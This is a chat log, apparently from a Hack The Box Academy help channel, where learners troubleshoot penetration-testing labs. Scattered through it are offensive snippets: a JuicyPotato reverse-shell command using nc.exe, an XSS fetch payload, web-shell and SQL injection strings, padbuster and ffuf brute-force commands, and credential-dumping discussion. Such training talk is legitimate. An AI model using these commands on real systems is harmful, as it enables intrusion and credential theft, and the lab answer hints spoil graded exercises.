#modules
Don't ask to ask for help, ask for help directly 
This seems to give a different response, but I still don’t see what I’m looking for in the logs.
Okay, well, basically I’m on the question “Find all TCP ports and submit the total number found”. I’ve tried doing numerous scans, with and without -Pn, -T4, -p-, and nothing comes up apart from “host seems down, if it’s up but blocking ping probes use -Pn”.
If I use -Pn, no ports come up.
Then there's probably something wrong with your connection
Can you ping the host?
What kind of shell have you used? I mean the content of weshell.php.
Did you try resetting the target?
TBH I haven’t tried resetting; I assumed it would be some hidden flag within nmap I need to use.
If it says “host seems down” at least make sure the host is up.
Can you ping the target??
I can, yes, but just reset it.
If this is what I think it is (path traversal), you may need to go up first with ../../../var/www/html/weshell.php
Brain is dead and fuzzy, but -Pn requires sudo? Also try doing it with -v.
Cool, I’ll give it a go.
Try switching to a different VPN region
I think you have to run a command to trigger that error.
Now that you have the right page add ?cmd=id or go to the page in a browser
id
Sometimes switching from UDP to TCP or vice versa does the trick. I noticed that sometimes they behave differently.
got it, thanks guys
Should it even matter?
It should still show up in the logs, no?
It will once you trigger the code
I have an XSS-related question I would like to ask. Part of the HTML code is like this:
<span style="font-size: 16px;">Hello, ImXSS</span>
It's known that src, script (in both uppercase and lowercase), and svg code are blocked, but <> is not blocked. How can I test if XSS is effective?
That helped. 👍🏽
And one more thing: sometimes the OpenVPN connection disconnects (you can check the logs), so there is a chance that you are scanning live IPs from your own network. Try "traceroute x.x.x.x"; it should show only 2 hops on your list.
got it, thank you
Your vpn was down?
That was a different question from the previous thread. Sorry for any confusion caused 🙂
Cool. Your image is a spoiler, please remove.
Can someone help me with the log poisoning section
of the CBBH module at the Academy?
The question is: "Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd"
So what am I missing?
Hey, I just started doing a few boxes.
I just did one and all the priv esc exploits were on the desktop... is this normal? Granted, it was rated easy, but still, this seems... almost pointlessly simple.
Without seeing exactly what you have done, I can only guess.
But a general tip.
Take a close look at the log file. Then think about which quotation marks do what in the log file.
It's weird. Well, as the Academy says, the one parameter we have control over is the page,
so when I did ls, the marked part ran some commands partially.
I mean I could ls, but not ls+-la (URL encoded),
or couldn't even do cd+/;ls, so...
Why are you using netcat to transfer files? python3 -m http.server 8000 on your own box is a better option IMO. Or you can use SSH file transfer, using the scp command.
@acoustic owl mind helping me out in private?
Sure, send me a DM.
Hey, I'm doing the Firewall and IDS/IPS Evasion - Hard Lab in the Network Enumeration with Nmap module, and my scans are taking really long for some reason (even if I try to do only "ip -p -sS"). Could this be due to the IDS/IPS in place, or is it something wrong with what I'm doing?
Run it with -v to check what is happening.
My IP got banned from trying too much, and after the 3 mins passed, it started working. Don't know what it was, but it is working. Still, thank you for the help :))
Ah okay the lockout was probably part of the assessment.
Haven't been able to do the modules through my own machine in a week. Is anyone else having this issue? Pwnbox is cool, but I prefer using my own.
Hi, I am stuck in the skills assessment for the Information Gathering module (https://academy.hackthebox.com/module/144/section/1311) on question 4. "After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb." Any hints? is the API key from the previous question to be used?
You have found a subdomain. Why don't you apply all the techniques shown in the module to this domain again? Then you should find what you are looking for
Thank you, got it. It is always something so simple...
Quick question about how the tiers work in the Academy. I'm currently using the student pass to go through the pentest pathway; if I want to do the higher tiers (e.g. Tier III, IV) after I'm done, is there a different subscription I have to use, or do I have to just buy the individual modules?
Working with IDS and IPS - Snort Rule Development:
There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword];
I'm stuck trying to find the right keyword.
I think it should work both ways, but first figure out which way is most cost effective for you.
I tried http.user_agent or http.uri, since they are the most logical keywords to include and match the content in the packet.
Hello, I'm stuck on "Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:", in the Infiltrating Windows part of the Shells & Payloads module.
I'm using msf and I tried different exploits, but each time things look fine and yet I didn't get the shell.
Can you help me ?
The format seems to be [word]; with the square brackets and the semicolon.
Are you sure I need to include the square brackets?
Did you try it? It seems to be, yeah,
since they look like just some placeholders for [keyword], to tell us to include a keyword followed by a ;
I did,
with [http.user_agent]; for example.
http.user_agent; isn't the answer either.
https://forum.hackthebox.com/t/working-with-ids-ips-snort-rule-development/305483/6
My bad, it seems to be keyword;
with the semicolon.
What confuses me more is why it isn't the user agent that's required to search within, since the rule content content:"|24 7b|jndi|3a|ldap|3a 2f 2f|" is actually found within the user agent
after inspecting the packet too
Can't really remember the exploit I used, but did you try the famous one from the course? Kinda hard to troubleshoot a non-working msf exploit with the info you gave.
Yes, I did exactly what is in the course and can't get the shell. Something must be wrong, but I can't see what.
I’m currently doing the easy lab for Firewall and IDS/IPS. I’m scanning the target with -sA for an ACK scan, using -Pn, and -n for DNS resolution; however, it's the same result every time: all ports are in the ignored state.
Am I missing a flag here?
What kind of error do you have? Are you connected to the VPN?
I'm using the Pwnbox. I get no error but do not get the shell.
I just tried it and it works fine. Can't say much more if you do not give much more :D
Where is the Discord Windows 7 support, lazy devs, hmm?
How can I send you a screenshot?
You have to follow the steps at #welcome to link your HTB account with Discord.
Hello, I have been struggling with this last question. I have access to a shell and I need to gain root rights. I found a CVE and sent it to the server, but bash denies the usage of exploit.c, so how am I supposed to get root rights??? CVE-2021-3156
It just blocks everything.
The question asks you to identify the OS of the target, so I'm not sure the flags you used are going in that direction.
Also used -sV; no ports show up.
I understand there’s IDS/IPS in play, so I tried -T 1 and -T 0 too.
We also know there is a webpage running on the target; that info could give you a clue on which port to scan.
Yeah, 80 I assume, as HTTP.
Yeah, bash can do that :) Where is this? Module, section?
? This is a shell, a reverse one. I'm trying to get root rights.
Yeah, but there are shells everywhere, bro.
what
You say "this last question". OK, but which one? Provide the module name and section.
I don't have gcc; it blocks the install also.
That's too much of a spoiler, IMO.
I tried them all, that's not a spoiler.
I've been breaking my head for like 2 hours and it just does nothing, nothing helps. Who even made this?
Did you check for a bash or Python script of the exploit?
It's not in Python, but what about it?
OK, so you can't compile on the target. Where else can you compile something?
Sorry. I don't want to get banned so early 🙂
You're using a C script; often there are Python scripts as well.
I couldn't find a Python one.
Okay, what was the CVE?
CVE-2021-3156
I did it but can't post a screenshot
I don't know, man. I just paste the image in the field and it works.
I don't think there is a Python one, IIRC.
I get it, this is frustrating, but just take a step back.
You've got a vulnerable target,
but you can't compile on this target,
so where else can you compile the exploit,
and what can you do to make an exploit work even if it is not compiled on the target?
Module: whitebox attacks
Section: client side prototype pollution
I’ve been stuck for a long time trying to solve the section’s challenge. My payload works locally but still can’t solve the challenge... Need a hint or a little push:
This is my payload:
/profile.php?id=2&proto[src][]=data:,fetch("http://94.237.59.63:49231/admin.php?promote=2")
Fixed the issue, big thanks to @soft reef
Yeah, my bad, I just realised you were on the Metasploit module and not somewhere else.
Hi guys, I'm on Windows Privilege Escalation Skills Assessment - Part I. I'm trying to escalate privs with JuicyPotato since I have the SeImpersonate privilege enabled. I'm not sure why it's not working.
c:\windows\temp\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\windows\temp\nc.exe 10.10.15.167 8443 -e cmd.exe" -t *
This is the error. Am I barking up the wrong tree?
Did you copy nc.exe to the target?
Yeah, I did. See screenshot above.
You can try with another CLSID.
Can you elaborate?
nvm
Got it working. Thanks for the tip.
But maybe just PrintSpoofer will work, since I see you got it there.
I see in my notes I used JP with another CLSID, but I can't see it mentioned in the course, so maybe not good advice.
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato#clsid-problems
I'm having issues with the netsh module in the pivoting section: I've set up the listener, but when I try to connect to the DC I get this error.
Update: I have also tried utilizing the Ethernet 2 IPv4 address to connect through, with the same error.
Are you sure the address in your RDP command, 10.129.42.198, is correct? It is in the course, but it doesn't match your netsh config.
smh (at myself) lol thanks
what does smh mean?
shaking my head
ah lol ok
Hi guys! I have a question regarding a module. Is this the right place to ask about it?
yes
I have a question about the Introduction to Windows Command Line module, and I have been told by the dev to ask around on the Discord for help.
Have been struggling for the past 2:40 hrs, but nothing works.
This is the page of the module.
Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.
This is the question.
I cannot find the file using the given information in the module
Did you try using the where command with /R?
yeah
I tried where /R C:\Users\htb-student\ waldo.txt
then where /R C:\Users\ waldo.txt
then where /R C:\ ...
You get the idea.
I also tried find and findstr,
but nothing.
In the DNS chapter of Footprinting, the last question is to find the FQDN of the IP ending with 203. I tried a zone transfer and found a few IPs, listed below:
10.129.94.174 inlanefreight.htb
10.129.18.15 app.inlanefreight.htb
10.12.0.1 dev.inlanefreight.htb ns.dev.inlanefreight.htb
10.129.1.6 internal.inlanefreight.htb vpn.internal.inlanefreight.htb
10.129.18.201 mail1.inlanefreight.htb
10.129.34.16 dc1.internal.inlanefreight.htb
10.129.34.11 dc2.internal.inlanefreight.htb
10.129.18.200 mail1.internal.inlanefreight.htb
10.129.1.34 ws1.internal.inlanefreight.htb
10.129.1.35 ws2.internal.inlanefreight.htb
10.129.18.2 wsus.internal.inlanefreight.htb
and with both a dig loop and dnsenum I tried brute-forcing IPs as well, with a few dictionaries, but with no success. Any hints as to what I am missing?
Thank you!
What list are you using?
OK, so maybe it is another list.
I've just solved it today
(through googling).
You need to enumerate all the possible domains, not only internal.inlanefreight.htb,
till you find the correct one,
which would give a list of records, one of which is an A record that has the IP x.x.x.203.
I just tried with one of the solutions you have written in your previous post and... one is working.
Anyone having target performance issues?
Hi!
I'm working through Attacking Common Applications. I am on Attacking Joomla, but when I try to use the exploit the module suggests for Directory Traversal, I get the error that the module click is not found. However, pip identifies click as installed. The Pwnbox won't allow the install of Python 2.7, so am I missing something?
Hi, what exploit are you trying to use?
https://www.exploit-db.com/exploits/46710 but I just realised that somehow I completely missed the next line that gives a Python3 version of the script. 🙄 I feel dumb now.
Ever figure this out? I'm stuck here too.
Nope, not yet
Skipped it for now
Hello, I'm doing the "Server-Side Attacks" module. I'm at the "SSTI Exploitation Example 2", but I want to get a reverse shell without using the tool tplmap, and I can't do it, I don't know why... If someone could help me please 😅
I'm facing this issue in the Linux privesc module, Miscellaneous Techniques, CPTS path.
Am I doing something wrong? Even when I followed the walkthrough it gave me the same error: there is no user priv-esc.
If anyone's doing the Windows lateral movement module, then let me know.
Haven’t done this module in a minute but is the command you’re doing exactly what’s in the module?
Yess
Where are you running the command from?
First command, exactly from the module walkthrough!
Oh my Goshhh, I'm an idiot!
Thanks for help thinking out loud guys 😅
Please, can someone help me with the Bypass Windows Defender module?
Question "What is the version of the antivirus signatures which are installed?"
I tried every way, but no solution.
I feel like this question is broken. The version reported on the VM is different from the version in the provided solution. @sterile wharf @static roost
How can I do it, please?
Hi everyone, I am wondering if I missed something with this module:
I am working my way through 'Windows Event Logs and Finding Evil: Tapping into ETW' (section 4)
Question is:
Replicate executing Seatbelt and SilkETW as described in this section and provide the ManagedInteropMethodName that starts with "G" and ends with "ion" as your answer. "c:\Tools\SilkETW_SilkService_v8\v8" and "C:\Tools\GhostPack Compiled Binaries" on the spawned target contain everything you need.
I noticed some other people in here had issues with this module, but mine isn't the same issue, and there wasn't anything in the solution when I tried reading through that which indicated I might have fouled something up.
Program 'SilkETW.exe' failed to run: The specified executable is not a valid application for this OS platform.At
line:1 char:1
+ .\SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
PS C:\Tools\SilkETW_SilkService_v8\v8\SilkETW> .\SilkETW.exe
Program 'SilkETW.exe' failed to run: The specified executable is not a valid application for this OS platform.At
line:1 char:1
+ .\SilkETW.exe
+ ~~~~~~~~~~~~~.
At line:1 char:1
+ .\SilkETW.exe
+ ~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
As someone suggested in another post I've tried from both PowerShell and the command prompt as an admin. Any thoughts?
I have to go there?
You don't have to, but it might help to open a new post there.
Thanks
Using theHarvester:
theHarvester -d (domain) -b google returns "invalid source". Any reason why?
Need more info; what module are you working on?
Oh shoot, wrong channel. My apologies.
Windows Defender Antivirus
There's no Windows Defender AV module.
That's the section name
INTRODUCTION TO WINDOWS EVASION TECHNIQUES
Anyway I wasn't referring to you with the "not enough info" comment
Thanks
Guys,
I need help.
I'm stuck on this question:
Send a GET request to the above server, and read the response headers to find the version of Apache running on the server, then submit it as the answer. (answer format: X.Y.ZZ)
I need help.
It's broken, I tried everything.
It didn't give anything.
Is the target lab spawned?
yea
"Click here to spawn target"
yes i did
In which command?
Should I type that?
Also it helps to give the Module name and Section name
So people that have done it can give you better instructions to help
curl -I https://www.inlanefreight.com
Did it tell you to use inlanefreight.com?
It told you to use the spawned webserver
The questions will explicitly tell you when they want you to do inlanefreight.com
Command?
yea
I meant show the command
OK, it's: http://ip:port
My IP and my port.
The IP.
🤦♀️
http://94.237.59.199:52061:80
Are you doing that with curl?
That's what I typed.
no
Your terminal is right
Do that with curl
With which command?
🤦♀️
Brother you need to learn how to critically think
Also, stop appending the :80 at the end
ok
You don't need to do that
Like this; but with the spawned target instead
oh ok
curl: (7) Failed to connect to 94.237.59.199 port 52061 after 5 ms: Couldn't connect to server
It says this.
Command?
Wait,
I typed something wrong.
curl -I 94.237.59.199:52061
That's it.
@fathom pendant
??
curl -I 94.237.59.199:52061
hello?
@fathom pendant where did you go, I need help
...
Dude chill, he will get back to you soon
ok
Now where did he go?
I'm waiting.
@fathom pendant
Are you ignoring me?
bruh
Fine, I don't need your help anymore.
please re-read the module
^^^
I did.
No need to be so rude @heady hamlet
instead of waiting around, maybe try diagnosing while you wait?
buddy no one is obliged to help you, exercise patience or solve it yourself
you will have to do some research in this field
OK, I solved it. The answer was in the module already, but the command does not work for me; I just saw the version from the module command.
Smh lol
Re-read the module, test, test, test, ask ChatGPT to explain things... more so because you will be frustrated later on at this pace when things get harder.
Sounds like it's solved then
God forbid a girl has hobbies
Module footprinting, Section OracleTNS.
While using odat.py I can't seem to get the credentials; the IP address is the same one I've inputted.
You know you can always use ChatGPT or Google to see if you're right or wrong.
ok
But make sure you understand where you went wrong. Don't just be like "ah yeyeyeye, I'ma do this"; literally read and see why you went wrong, try to understand it.
Anyone done this one yet? https://academy.hackthebox.com/module/113/section/1216 I'm stuck on the second password. I've dug through every file.
Once we obtain a foothold on a user machine with a normal user account, although we need admin to dump LSASS process memory and the SAM database, we can still get some value from mimikatz dumping Kerberos tickets for the user. Correct?
Because Kerberos tickets for the user we have the password for may give us access to other services on the network?
If it's non-elevated, you can only extract tickets for that specific user. But if you already have access to the user's creds, then the tickets wouldn't grant you anything extra.
In the tunneling module, I'm trying to do some reverse tunneling with chisel, but the Ubuntu box (pivot host) gives me this error, and I can't install anything with apt on it to fix it. Any solutions?
Even after rebuilding it, restarting the machine, etc.
Since the machine has no internet access, this shit is lowkey annoying.
Took a break, moved ahead to the next section and came back to this. Ended up in the same spot in case anyone has anything to add.
I've spawned the Windows box to check; when I did this module I did not encounter that error.
@somber sentinel I just tried, and I do not understand how you get that error, as it is pretty straightforward: same commands as the course, and yours seem correct as far as I can tell. Did you try to respawn the same box to start fresh?
Try changing vpn regions? Sometimes that helps
Hello, just a quick question: are there any alternatives for downloading files from a Windows machine? I am currently attacking LSASS and extracting the lsass.dmp file, but it seems that the connection is suddenly cut off. I tried firing up an HTTP server from PowerShell, but the download speed is low, and the ETA is around 1 hour. I got the same results when looking up solutions in the module; the connection just cuts off.
You can use an SMB server, but the speed isn't too different from an HTTP upload server running on your own machine. So maybe check your network connection.
Choose a VPN server closer to you.
Yeah, I tried smbserver as well; the error is "network error occured". Currently using Pwnbox and the closest one, but will try to look for other servers as well. Thanks!
Hmm, that should work. Reset the target and try again, maybe.
PIVOTING, TUNNELING, AND PORT FORWARDING -> Remote/Reverse Port Forwarding with SSH
I want to access the Windows target to run my reverse shell payload, but I'm a bit unsure how to. In the previous module, SOCKS tunneling was used, but there the Windows credentials were also provided.
I'm not sure if I have to just redo the steps from the last section, reuse the passwords, and then add the steps from the current module in? I have answered the questions, but the module says "In addition to answering the challenge questions, practice this technique and try to obtain a reverse shell from the Windows target."
AD Enumeration & Attacks - Skills Assessment 1
I've tried all variations of the DCSync command, nothing works.
I can nslookup and ping the domain controller.
Which machine are you running mimikatz on?
RDP into ms01.
I don't think you need to run mimi on the DC to DCSync.
Can you check if the host has an interface in the internal network?
No, I don't think so. I thought he had /dc, not /domain.
I don't think I ever used mimikatz for that.
With ipconfig?
yeah
Try /dc and adding the DC manually.
It should be able to resolve it through the FQDN, though.
But yeah, I don't use mimi for DCSync either.
Resetting it one more time wouldn't hurt.
Yeah, adding /dc doesn't work.
Searched up the command here and it shows someone getting the hash lol.
Can you ping the DC?
yup ^
What if you put the DC's IP instead of the hostname?
Sounds like you may just need to change regions or something.
uhuh
I need to impersonate the t* user.
Is there a way to impersonate remotely?
I've changed regions now.
It is the same target, so... yes.
Since the questions are just based on the written content, they give you the opportunity to practice.
You have the password.
I do.
I found myself using the Linux tools more often for AD attacks like DCSync.
Doing it with mimikatz/Rubeus is kinda annoying.
Thanks!
In Windows Fundamentals, File System section: the NTFS permission List Folder Contents is specified as including executing files as well. I guess it's mistakenly specified, or not?
Just a quick tip: I try to not terminate the target at each section. I just check if it is the same one on the next, so there is no need to respawn a new one every time.
Same, but usually they take so long for me, so I take a break after each. I did the other module yesterday. But of course I'd probably be able to see if the target "spawns" for the next/previous module as well.
Should I look into these errors?
This is correct.
You can configure msf to use an msfdb, but it's not needed in most cases.
I believe the Metasploit module goes through this.
But the List Folder Contents permission does not allow the assigned user to execute any files in the corresponding folder, right? Then how is executing files possible?
Nope, with List Folder Contents you'll gain read and execute.
Anyone willing to privately discuss the Attacking Common Services -> SQL module?
I passed it but I've got an unanswered question.
Sure DM.
Excuse me, I want to ask something. Why can't I get the correct answer in the ZAP Scanner lesson (Module: Using Web Proxies) when I have already submitted the correct answer?
Make sure you don't have any spaces at the beginning or end of your answer
I did, but it still says "Incorrect Answer"
Oh sorry nvm, you're right, I have a space at the beginning
Thanks!
Hi
Anyone else got problems with libclntsh.so while installing odat?
Running UTM Kali on M1.
odat is in the repos if you use Parrot or Kali. Did you try that?
ow
Yeah, that's a possibility.
Couldn't get much of a hint on the forums either.
https://forum.hackthebox.com/t/help-installing-odat-in-kali-linux/277312
Thanks, I'll check it out.
I just saw a comment, it seems to be working 🤞
Apparently there is also Docker:
https://github.com/quentinhardy/odat/tree/master-python3/Docker
Thanks for checking, I did. I'll give it another shot today. Maybe try changing regions too as @storm elk suggested. Yeah, as modules go this one is fairly straightforward so I am a bit confused too.
I need some clarification on the first question of the Windows File Transfer Methods in the File Transfers module. The question is: Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer. What I'm not seeing is the target where the flag.txt is at. I enumerated the target, but I feel like the question is pointing me to the Pwnbox. I've used wget and understand the web root is a directory on a web server. Any ideas what I'm missing?
Did you spawn the target?
Yep
Is the target where I should be looking for flag.txt?
Yes, correct.
Okay, thank you!
Do you have some more info?
yea
The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag
The question, and the module, is Web Requests.
I would like to ask, will the CPTS exam involve binary? (https://academy.hackthebox.com/module/113/section/2139)
No.
Has anyone done the BloodHound course? Looking specifically at the BloodHound for Blue Teams section, the last question: Which relationship (edge) do we need to remove to break the path between David and Domain Admins?
Not finding anything in PlumHound or BloodHound.
Are there any other, apparently known, sections to cross out?
That section is more of a demo than actually getting you to do it.
IIRC, check the edge in BH.
For the HTTP/TLS skills assessment, the speed seems to take a very long time, and I'm constantly getting hit with the error 'no matching response on [Byte x]' after the first couple work. I have to keep refreshing the box.
Is my command just incorrect?
|| padbuster http://94.237.59.63:54332/token "0e0d74356da663454101d805584b6190eb57e7e30d9817ecfbf7973c9ab5df54f46a586de5c8693203896946088172a3" 16 -encoding 1 -post "token=0e0d74356da663454101d805584b6190eb57e7e30d9817ecfbf7973c9ab5df54f46a586de5c8693203896946088172a3" -cookie 'user=e229d8a9e42697ab26f61c38e00db5ae5f1cd90fdb85f20f81a48623746e914d3d2bdd97415095b66b720e552e81fedd00000000000000000000000000000000' -error 'Decryption Error. Invalid Token!' -usebody ||
Heya. I started working on the XSS module and quickly realised I should get some basic knowledge of JavaScript (at least the basic structure and syntax), as I don't really understand what the commands I am entering are and how they function. Are there any websites or YouTube playlists you guys can recommend surrounding the basics of JavaScript?
I had a look and there seem to be 1001 different websites and individuals teaching JavaScript, so I was hoping there was one you guys can recommend in particular.
https://www.giraffeacademy.com/ isn't bad either
Nice, thanks, will have a look at them.
Sure!
Hello to all. I need some help to understand some strange behaviour. I am on the Remote File Inclusion chapter in the File Inclusion module. I am opening a Python HTTP server to download a PHP web shell onto the back-end server to get RCE. When I do this from my root folder and my webshell is there, the file gets downloaded and I get remote code execution. But when I host the file in a folder such as ~/Bounty/HTB (personal) and I open the Python server, I still get the download of the shell but I don't get remote code execution. Do you know why this is happening?
Anyone I could PM about this?
Do you have a screenshot?
This is when I try to download from a personal folder. You can see the PHP server on the right and the download happening when I request the file.
This is when I do the same from the root folder, which works directly.
Again, PHP server on the right.
This time it works fine.
By the way, the same result can happen through LFI hehe.
Look at the dir you started your web server in and then look at your file path in your download command.
In the top screenshot, your web server is working in /home/alex/Bounty/HTB, and you request a file at http://ip/home/alex/Bounty/HTB/shell.php, so what you're trying to download is the file at /home/alex/Bounty/HTB/home/alex/Bounty/HTB/shell.php on your machine.
Second screenshot: your server is in the root dir, and you request /shell.php, so you would be downloading the file at /shell.php on your machine, which happens to be there.
Can someone help me with the skills assessment for Broken Authentication? I have tried tampering with the session cookie, brute-forcing logins, auth bypass via direct access, but nothing is working.
Why is it put two times?
Whatever you are trying to download, you have to specify the path relative to the location of your web server.
So the root for the server is that HTB folder already?
If I have a file called rev.php at /home/calc/scripts/rev.php and I start my server in /home/calc, then the file on my server can be located at http://ip:port/scripts/rev.php
Heheheh, I see the light :D
You can test this by starting a web server and then navigating to it in your browser.
Oh wait, nvm, I think I have found something.
Was anyone able to solve the challenge for:
Module: Whitebox Attacks
Section: Client side prototype pollution
?
Just ask your question, plenty of people have solved it.
As far as I remember, it's not relevant where you export it.
I want to dump, but I don’t know where to click
I think it's right click -> Dump Memory to File.
I've been looking for 30 minutes and still can't find it.
Select the address, right click on it, then Dump Memory to File.
You have to right click on the memory address from here.
Yes, after you identify the right address here, just right click on it and then Dump Memory to File.
I think if you sort it by address, or size, it will get stable.
He kept sliding up and down, and I clicked pause
Well if it's still running it'll keep moving
If it's still moving, then you didn't stop it lol
click on type and i think will get stable, or on protection
I can only find this step
I don’t have the energy to search again. Can anyone tell me how to pause it?
someone pls help me, i am doing the broken auth skills check and i now have to login for the user gladys but cannot find the otp, i first tried a wordlist with 10000 nums and even 100000 but nothing is working, here is the command i'm using: ffuf -w ./tokens.txt -u http://94.237.59.63:39183/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=5t6i1j2qu0592dbl65nrclt4ie" -d "otp=FUZZ" -fr "Invalid OTP."
Afaik you don't need to brute it but I haven't done this
??? wdym, i got the login and have already tried other things like auth bypass via direct access and attacking session tokens but that doesn't seem to be working
just what others have said ¯\_(ツ)_/¯
who is others?... need to find someone who has done it
Utilize the discord search feature bro
good idea, thc u
noo wayyy did it, u were right i didn't need to brute the 2fa code just needed to: ||send req to profile.php after i logged in even without doing the 2fa||
I have a problem with Pivoting, Tunneling and port forwarding in icmp tunneling task
I cannot ssh to the pivot host
I can confirm that the port is up, by doing nmap scan or banner grab using netcat
however ssh fails every times and timeouts
looking at wireshark I can see that key exchange is initiated, but later I only see TCP Retransmission packets from my host
followed by TCP RST and connection termination
Am I doing something wrong or the lab is simply not working properly?
Hey, let's say you are going through this content https://academy.hackthebox.com/module/158/section/1428 ( a section in pivoting ) Would you then read the material and then start the box and answer the questions, or start off with starting the box and following through as you progress?
With the pivoting module, I suggest going along with it
yeah I generally start the box and follow the material, reading a doing at the same time
maybe with a quick overview of the whole technique to know where i'm heading
Hello. I am sorry but i cannot post somewhere else. (is that normal?)
and also i paste the course into obsidian so i have to reformat certain things, check if any tools are needed etc
My Hero
Is that ok to fully customize the box we have?
Hello everyone I'm stuck on a SQLi problem, I want id = 5 I use the OR operator for queries but it does not work https://academy.hackthebox.com/module/33/section/799
if you are referring to the pwnbox, it is your instance. you may customize it as you see fit, you will just need to save the config to your machine
i tried also like that
i don't remember how to save the config, but i believe it is explained somewhere in the HTB help documentation
What is Pwnbox? How does it work? Read about it here.
alright, thanks again
What are ppl using 4 notetaking? Using obsidian. Thinking of switching to something more online. Perhaps github?
Personally i use CherryTree
That's not online I.e cloud web though is it?
Oh, sorry, didn't read that point
This is likely off topic tbf
Looks like this is a not a free feature
the Pwnbox
you can use everything, obsidian, cherrytree, onenote
free users can only use it for two hours yes
but most people use their own virtual machine
i'll do that way too
Iirc, unless they changed it recently, you can only save on the labs pwnbox, the academy one does not have a way to do so.
Notion gets mentioned a lot for online notes. Or you can keep using obsidian and put all your notes into a repo and push that to your git repository of choice.
anyone ?
What was your query?
it's ok, i'll do without pwnbox. I am poor.
i use admin') OR id = 5-- -, my queries find admin but doesn't show me the user with id 5
Looks like admin is true, so it returns that. Try a non existent username?
Everything after -- is being ignored
Its close, but you are using admin and id 5.
yes and that what i want after after my request that it be ignored so that it displays the username with the id 5 after maybe I misunderstood
Yes so maybe you dont need the admin
yesss i understand thank everyone
these might help as well https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection#authentication-bypass
I found it, but why put a user that doesn't exist if you want to retrieve the id of an existing user?
Hello - Got a "question" about the skills assessment of the footprinting module easy-lab --> in the description it is stated that 3 internal servers have to be tested - first is a DNS server - what's the point of this - no DNS server has to be tested? Shouldn't this intro be removed or updated or am I missing anything?
ah because even if the gold operator user has a request that is true, it will be able to return the id = 5?
its an OR statement, so user that doesnt exist is false OR id=5 is true. I think even works without user.
ok ok thanks it's clearer in my mind
indeed it works without anything
#1234357888114364508 would be a good place for this
ok
Did you see port 53?
yes i did
I don't have specifics in my notes but iirc it's a ftp proxy and there's nothing to solve via dns
yep
Ok so its running a dns server.
yes it does, we are talking Footprinting - Easy Lab right?
Did you get the flag?
yes
are you sure its footprinting?
100%
k give me a sec, im gonna log in
hey @ocean night possible to dm you?
Sure - will help if I can
module: WINDOWS PRIVILEGE ESCALATION
section: Credential Hunting
found passwords in
||Documents\stuff.txt
AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt
C:\inetpub\wwwroot\web.config||
none of them are accepted, any help?
How did you search?
using findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
You're on the right track.
Hey, anyone did API attacks? In the Mass Assignment section what are we supposed to do? I created an order and trying to add items. I added success message = true and price = 0 but nothing works
the hint says to start in Users, so that should speed up going through files
Yes look for interesting files like config files, settings etc..
thanks. I thought about pushing my notes to a git repo, but in a sense i want them to be viewable via a browser. so really i should just use git i suppose
github renders markdown
yeah i've been thinking i should just use git hub
although i just read that notion allows u to publish your notes to the web
Did you read the hint?
obsidian notes are markdown?
Yes
Then you know which endpoint you should use
In the Orders end point, I added OrderItems. It doesn't seem to be processing it. In the Items end point, it seems not to like product ID. I tried adding SuccessMessage:true and price:0 nothing works
I know the endpoint. I don't know the parameter name.
send me a dm
Can i ping someone to get a hint for AD Trust Attacks - Skills Assessment? thank you
hey i'm re-doing the "Information Gathering Web Edition - Skills Assessment" does anyone know how to specify the port for the reconspider.py. It seems like the entire tool recently got a recall
Ye some extended markdown, latex support as well, and ofc html
? The one from the module?
it was i dont understand the problem he's trying to create for him/herself
It's the same you'd specify as if viewing the page via browser; http://site.htb:port
I thought that as well but i started getting this error
You can't post screenshots
Then you're doing something wrong, I'm assuming you downloaded the reconspider tool from the module with wget?
Because there is one on github that's a completely different tool
yes, i followed the instruction from htb
yes http://[vhosts.site.htb:port/sub] let me know if i need to edit this not to spoil
lol i wish i had your machine ig
okay, it works for external sites like inlanefreight.com but for the skill assessment it allows returns blank results, am I doing something wrong enumeration wise or is it the tool?
Anyone know where we find the password for the sample report in the resources of the documentation and reporting module?
Maybe you need to dig deeper
It's likely given in one of the first sections
Don't forget subdomains of subdomains exist
back to the cutting board
Drawing board*
the turn tables have turned
can you lend me a hint, its okay if not
Oh how the turns have tabled
.
oh ive found it now. I'm tired and scanned over it
will do
¯\_(ツ)_/¯
hey, I'm doing "Network Enumeration with Nmap" and I'm on medium lab right now. I clearly know I have to use ||sudo nmap -sSU -p 53 --script dns-nsid $ip||, but as a result I don't get any response from the script, it just shows me opened udp port.
Unfortunately, I can not send a screenshot
Do this on the pwnbox
For w/e reason it's finicky on regular vms
Hi! I need some clarification on the content in [Password Attacks] Pass the Ticket (PtT) from Windows.
In the module, under Rubeus - PowerShell Remoting with Pass the Ticket, Creating a Sacrificial Process with "createnetonly" was mentioned.
